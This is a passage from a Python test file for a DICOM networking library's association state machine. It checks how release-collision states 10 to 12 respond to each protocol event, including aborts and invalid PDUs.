b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', a_abort), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta9')
assoc.dul.send_pdu(self.get_release(True))
self.wait_on_state(assoc.dul.state_machine, 'Sta11')
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta10')
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta12')
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
